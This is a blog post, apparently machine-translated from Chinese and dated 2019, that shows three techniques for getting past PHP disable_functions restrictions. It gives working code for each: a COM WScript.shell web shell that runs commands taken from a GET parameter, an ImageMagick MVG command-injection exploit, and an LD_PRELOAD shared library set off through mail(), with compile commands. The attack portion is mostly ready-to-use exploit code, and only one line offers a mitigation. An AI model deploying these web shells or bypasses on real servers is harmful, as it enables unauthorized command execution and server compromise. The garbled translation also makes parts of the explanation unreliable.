PHP bypass disable_function restrictions (a)
Test environment php 5.4.5
Bypass system components using 0x01
1. window com components (php 5.4) (high version of the extension you want to add your own)
(COM component that it is intended that the earliest design, cross-language reuse program components.)
test:
<?php
$command=$_GET['a'];
$wsh = new COM('WScript.shell'); // 生成一个COM对象 Shell.Application也能
$exec = $wsh->exec("cmd /c".$command); //调用对象方法来执行命令
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>
Thorough solution is to delete the files in the System32 directory wshom.ocx
2. Use ImageMagick vulnerabilities to bypass disable_function
ImageMagick is a powerful, stable and open source tools and development kits can be used to read, write and process more than 89 kinds of basic format of the image file
if there phpinfo see this, you can try the following
Download the official website address: https: //imagemagick.org
Expand Downloads:
https://pecl.php.net/package/imagick
https://windows.php.net/downloads/pecl/releases/imagick/3.4.1/
<?php
echo "Disable Functions: " . ini_get('disable_functions') . "\n";
$command = PHP_SAPI == 'cli' ? $argv[1] : $_GET['cmd'];
if ($command == '') {
$command = 'id';
}
$exploit = <<<EOF
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|$command")'
pop graphic-context
EOF;
file_put_contents("KKKK.mvg", $exploit);
$thumb = new Imagick();
$thumb->readImage('KKKK.mvg');
$thumb->writeImage('KKKK.png');
$thumb->clear();
$thumb->destroy();
unlink("KKKK.mvg");
unlink("KKKK.png");
?>3. Use the environment variable LD_PRELOAD to bypass
php's mail function in the implementation process will invoke the default system program / usr / sbin / sendmail , if we can hijack sendmail program, and then mail function to be able to achieve our objective triggers
LD_PRELOAD is an interesting environment variable Linux system: "It allows you to define priority loaded before running this dynamic link library function is mainly used for the same function selectively load a different dynamic link library through. this environment variable, we can in the main program and its dynamic link library intermediate load other dynamic link library , or even override the normal function library. on the one hand, we can use this feature to use your own or better function (no need to someone else's source code), and on the other hand, we can also inject program to program to others, so as to achieve a specific purpose.
Examples: using mali function test
#include<stdlib.h>
#include <stdio.h>
#include<string.h>
void payload(){
FILE*fp = fopen("/tmp/2.txt","w");
fclose(fp);
system("mkdir /var/www/html/test");
}
int geteuid(){
FILE *fp1=fopen("/tmp/2.txt","r");
if(fp1!=NULL)
{
fclose(fp1);
return 552;
}else {
payload();
return 552;
}
}执行命令编译为一个动态共享库:
gcc -c -fPIC a.c -o a
gcc -shared a -o a.soLD_PRELOAD set by putenv, so that our program is called priority. Send a message to trigger a mail function on webshell. Results
<?php
putenv("LD_PRELOAD=/var/www/html/a.so");
mail("[email protected]","","","","");
?>
posted @ 2019-05-29 15:30 Mr. Ching reading (...) Comments (...) edit collections